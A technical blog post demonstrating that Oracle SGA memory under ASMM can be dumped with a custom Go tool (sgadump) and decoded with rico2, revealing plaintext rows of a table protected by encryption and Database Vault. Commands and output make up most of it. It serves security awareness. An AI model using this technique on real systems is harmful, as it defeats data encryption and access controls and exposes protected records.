Dumping SGA to read encrypted blocks

by Kamil Stawiarski

After my last article AMM vs security, Martin Berger wrote to me:

even without AMM you can do it:
write your own process which attaches to the same shm segments – and use its memory mapping (?)

My response was that it is also possible with ASMM but AMM makes it extremely easy. And this is because you can treat memory as regular binary files when operating on AMM.

Today I want to show you how dump blocks from SGA which is configured as ASMM to get into encrypted data which is also protected by Oracle Database Vault. To set up the environment I will use examples from a previous blog post.

Code for sgadump is written in GoLang, so please use those instructions to setup your environment: https://golang.org/doc/install

Please make sure that your ENV is set up properly:

[oracle@rokoko ~]$ cat .bash_profile | grep go

After installing GoLang you can do the following to compile my tool:

[oracle@rokoko ~]$ mkdir -p ~/go/src/github.com/ghetzel
[oracle@rokoko ~]$ mkdir -p ~/go/src/github.com/ora600pl
[oracle@rokoko ~]$ cd ~/go/src/github.com/ghetzel
[oracle@rokoko ghetzel]$ git clone https://github.com/ghetzel/shmtool
Cloning into 'shmtool'...
remote: Counting objects: 92, done.
remote: Total 92 (delta 0), reused 0 (delta 0), pack-reused 92
Unpacking objects: 100% (92/92), done.
[oracle@rokoko ghetzel]$ cd ~/go/src/github.com/ora600pl
[oracle@rokoko ora600pl]$ git clone https://github.com/ora600pl/sgadump
Cloning into 'sgadump'...
remote: Counting objects: 9, done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 9 (delta 0), reused 9 (delta 0), pack-reused 0
Unpacking objects: 100% (9/9), done.
[oracle@rokoko ora600pl]$ cd sgadump/
[oracle@rokoko sgadump]$ ls
README.md  sgadump.go
[oracle@rokoko sgadump]$ go install

If your ENV was setup properly, you’ll find a binary file under ~/go/bin/sgadump and use it like this:

[oracle@rokoko sgadump]$ sgadump
sgadump by Kamil Stawiarski (@ora600pl) - dumps database blocks from SGA.
Usage: sgadump -b block_size -d data_object_id -s shmid -o output_file_name

Cool, now let’s make sure, that we are using ASMM and not AMM:

SQL> sho parameters memory_target

------------------------------------ ----------- ------------------------------
memory_target			     big integer 0
SQL> sho parameters sga_target

------------------------------------ ----------- ------------------------------
sga_target			     big integer 1120M

Now we will check if the tool works – first of all we have to check data_object_id of HR.EMPLOYEES, load encrypted data to memory, get ID_SHM for SGA and dump blocks. Easy, right? 🙂

SQL> alter system flush buffer_cache;

Zmieniono system.

SQL> select data_object_id
  2  from dba_objects
  3  where object_name='EMPLOYEES'
  4  and   owner='HR';


SQL> select dbms_rowid.rowid_block_number(rowid) as bno, count(1)
  2  from   hr.employees
  3  group by dbms_rowid.rowid_block_number(rowid);

       BNO   COUNT(1)
---------- ----------
       132	    9
       131	   98

So we now that rows from that table fit in 2 database blocks.
Now let’s try to dump them into a file using my simple tool.

[oracle@rokoko sgadump]$ ipcs -m

------ Segmenty pamięci dzielonej ----
klucz      id_shm     właściciel uprawn.    bajtów    podłączeń stan
0x00000000 262144     oracle     600        8622080    116
0x00000000 294913     oracle     600        1157627904 58
0x00000000 327682     oracle     600        8155136    58
0x91a6a268 360451     oracle     600        8192       58
[oracle@rokoko sgadump]$ sgadump -b 8192 -d 73865 -s 294913 -o emps
shmid = 294913	 size is 1157627904, blocks = 141312
Dumped 2 blocks to emps

Awesome! Now we can use rico2 to compare the content of encrypted blocks in a datafile and unencrypted ones in SGA.

[oracle@rokoko ~]$ cat listfile.rico2
1 /home/oracle/go/src/github.com/ora600pl/sgadump/emps
2 /u01/app/oracle/oradata/DUPA12/datafile/o1_mf_secure_d_fn9jj6xy_.dbf
[oracle@rokoko ~]$ python rico2.py listfile.rico2
RICO v2 by Kamil Stawiarski (@ora600pl | www.ora-600.pl)
This is open source project to map BBED functionality.
If you know how to use BBED, you will know how to use this one.
Not everything is documented but in most cases the code is trivial to interpret it.
So if you don't know how to use this tool - then maybe you shouldn't ;)

Usage: python2.7 rico2.py listfile.txt
The listfile.txt should contain the list of the DBF files you want to read

 !!! CAUTION !!!!

This tool should be used only to learn or in critical situations!
The usage is not supported!
If found on production system, this software should be considered as malware and deleted immediately!

1	/home/oracle/go/src/github.com/ora600pl/sgadump/emps
2	/u01/app/oracle/oradata/DUPA12/datafile/o1_mf_secure_d_fn9jj6xy_.dbf
rico2 > set dba 2,131
	DBA		0x800083 (8388739 2,131)
rico2 > map
 File: /u01/app/oracle/oradata/DUPA12/datafile/o1_mf_secure_d_fn9jj6xy_.dbf(2)
 Block: 131			Dba: 0x800083
Wrong kind of block. Currently supported: 6.1
rico2 > d
 File: /u01/app/oracle/oradata/DUPA12/datafile/o1_mf_secure_d_fn9jj6xy_.dbf(2)
 Block: 131 Offsets: 0 to 512		Dba: 0x800083
06a20000 83004001 1f6d1900 00000114 | ......@..m......
c2d40000 b64bd34f 98dcff3f 23d0c822 | .....K.O...?#.."
ba1b1249 8e0d572f 740b8db7 f7fd6a15 | ...I..W/t.....j.
679856ef a61c8130 896c0066 cd6b7a45 | g.V....0.l.f.kzE
b3751eb2 b40cdeb6 8f16bbdf f9b4f53d | .u.............=
50199851 dbe0dde9 5688576b 9e9df4a0 | P..Q....V.Wk....
0f481d54 b36b746f b98f6a21 0d13fb51 | .H.T.kto..j!...Q
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<16 bytes per line>

As you can see I can’t read the encrypted block in a datafile. But let’s check the dump from SGA:

rico2 > set dba 1,0
	DBA		0x400000 (4194304 1,0)
rico2 > map
 File: /home/oracle/go/src/github.com/ora600pl/sgadump/emps(1)
 Block: 0			Dba: 0x400000
 DATA Table/Cluster

 struct kcbh, 20 bytes				@0

 struct ktbbh,  96 bytes 			@20

 struct kdbh, 14 bytes 				@124

 struct kdbt[1], 4 bytes			@138

 sb2 kdbr[9]					@142

 ub1 freespace[7406]				@160

 ub1 rowdata[622]				@7566

 ub4 tailchk					@8188

rico2 > p *kdbr[0]
rowdata[549]				@8115	0x2c
flag@8115:	0x2c
lock@8116:	0x0
cols@8117:	11

col    0[3]     @8118:  c20263
col    1[6]     @8122:  446f6e616c64
col    2[8]     @8129:  4f436f6e6e656c6c
col    3[8]     @8138:  444f434f4e4e454c
col    4[12]    @8147:  3635302e3530372e39383333
col    5[7]     @8160:  786b0615010101
col    6[8]     @8168:  53485f434c45524b
col    7[2]     @8177:  c21b
col    8[0]     @8180:  *NULL*
col    9[3]     @8181:  c20219
col   10[2]     @8185:  c133

rico2 > x /rncccctcnnnn
rowdata[549]				@8115	0x2c
flag@8115:	0x2c
lock@8116:	0x0
cols@8117:	11

col    0[3]     @8118:  c20263                                   198
col    1[6]     @8122:  446f6e616c64                             Donald
col    2[8]     @8129:  4f436f6e6e656c6c                         OConnell
col    3[8]     @8138:  444f434f4e4e454c                         DOCONNEL
col    4[12]    @8147:  3635302e3530372e39383333                 650.507.9833
col    5[7]     @8160:  786b0615010101                           2007-06-21:00:00:00
col    6[8]     @8168:  53485f434c45524b                         SH_CLERK
col    7[2]     @8177:  c21b                                     2600
col    8[0]     @8180:  *NULL*
col    9[3]     @8181:  c20219                                   124
col   10[2]     @8185:  c133                                     50

KaBoom! 🙂

So as you can see – it is possible even with ASMM but it is much, much harder and we don’t want to make things easy for potential "hackers" ;).
And nothing is impossible in IT. It can be just unaffordable… or it can take longer than a life of one generation 😉

Good security is made by people you know and people you should trust. Nothing will protect itself – no matter how fancy software you’ll buy. Even the most advanced autonomous software – human immunology system – requires maintenance and correct usage and – from time to time – diagnostic by an expert you trust.

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Database Whisperers sp. z o. o. sp. k.
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